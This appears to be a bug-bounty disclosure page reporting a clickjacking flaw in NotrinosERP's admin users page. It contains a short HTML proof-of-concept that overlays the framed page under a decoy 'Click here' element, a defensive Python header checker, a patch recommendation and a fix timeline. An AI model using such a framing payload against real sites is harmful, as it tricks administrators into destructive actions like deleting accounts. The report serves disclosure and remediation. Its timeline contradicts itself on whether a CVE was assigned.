Clickjacking Leads To User Deletion in notrinos/notrinoserp

Valid

Reported on Aug 21st 2022


  1. Hello team, on notrinoserp there is no clickjacking protection implemented (X-Frame-Options), so an attacker can perform a clickjacking attack, and in this case I'm able to delete a user account via this vulnerability from the admin account; here is the PoC:

Exploit Script:

```html
<style>
    iframe {
        position:relative;
        width:1200px;
        height: 650px;
        opacity: 0.4;
        z-index: 2;
    }
    div {
        position:absolute;
        top:183px;
        left:880px;
        z-index: 1;
    }
</style>
<div>Click here</div>
<iframe src="http://127.0.0.1:4445/admin/users.php?"></iframe>
```

Patch Recommendation:

  1. Add an X-Frame-Options header to prevent clickjacking/UI redressing attacks
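A defender-side check for the patch recommendation above, added here as an example that is not part of the report or of the NotrinosERP code base: it classifies a response's `X-Frame-Options` and CSP `frame-ancestors` headers so the fix can be verified once deployed. `check_url` is a hypothetical helper and the header sets at the bottom are constructed.

```python
import urllib.request


def frame_ancestors(csp: str):
    """Return the frame-ancestors source list from a CSP value, or None if absent."""
    for directive in csp.split(";"):
        tokens = directive.strip().split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return [t.lower() for t in tokens[1:]]
    return None


def evaluate_framing(headers: dict) -> dict:
    """Classify anti-framing protection from a response header map (any case)."""
    h = {k.lower(): v for k, v in headers.items()}
    ancestors = frame_ancestors(h.get("content-security-policy", ""))
    xfo = h.get("x-frame-options", "").strip().upper()
    # Browsers that support CSP apply frame-ancestors and ignore X-Frame-Options.
    if ancestors is not None:
        if ancestors in ([], ["'none'"]):
            return {"protected": True, "mechanism": "csp", "policy": "deny"}
        if any(a in ("*", "http:", "https:") for a in ancestors):
            return {"protected": False, "mechanism": "csp", "policy": "wildcard"}
        policy = "sameorigin" if ancestors == ["'self'"] else "allowlist"
        return {"protected": True, "mechanism": "csp", "policy": policy}
    if xfo in ("DENY", "SAMEORIGIN"):
        return {"protected": True, "mechanism": "x-frame-options", "policy": xfo.lower()}
    if xfo.startswith("ALLOW-FROM"):
        # Obsolete directive: modern browsers ignore it, so the page stays framable.
        return {"protected": False, "mechanism": "x-frame-options", "policy": "allow-from"}
    # Neither header present: the state this report describes for users.php.
    return {"protected": False, "mechanism": None, "policy": "missing"}


def check_url(url: str) -> dict:
    """Hypothetical helper: fetch a URL and evaluate its framing headers."""
    with urllib.request.urlopen(url) as resp:
        return evaluate_framing(dict(resp.headers.items()))


# Constructed header sets: the vulnerable response and two fixed variants.
VULNERABLE = {"Content-Type": "text/html"}
FIXED_XFO = {"Content-Type": "text/html", "X-Frame-Options": "SAMEORIGIN"}
FIXED_CSP = {"Content-Type": "text/html",
             "Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'"}

if __name__ == "__main__":
    for name, hdrs in (("vulnerable", VULNERABLE), ("xfo", FIXED_XFO), ("csp", FIXED_CSP)):
        print(name, evaluate_framing(hdrs))
```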

# Impact

1. An attacker can delete user accounts by exploiting this vulnerability to mislead the admin.

- We are processing your report and will contact the notrinos/notrinoserp team within 24 hours. (a year ago)
- A GitHub Issue asking the maintainers to create a SECURITY.md exists. (a year ago)
- We have contacted a member of the notrinos/notrinoserp team and are waiting to hear back. (a year ago)
- Phương gave praise (a year ago): "Thanks @akshayravic09yc47 for detecting this vulnerability, it will be fixed soon."
- Phương assigned a CVE to this report. (a year ago)
- Phương validated this vulnerability. (a year ago)
- Akshay Ravi has been awarded the disclosure bounty.
- The fix bounty is now up for grabs.
- Phương marked this as fixed in 0.7 with commit c2ff3d. (a year ago)
- Phương has been awarded the fix bounty.
- This vulnerability will not receive a CVE.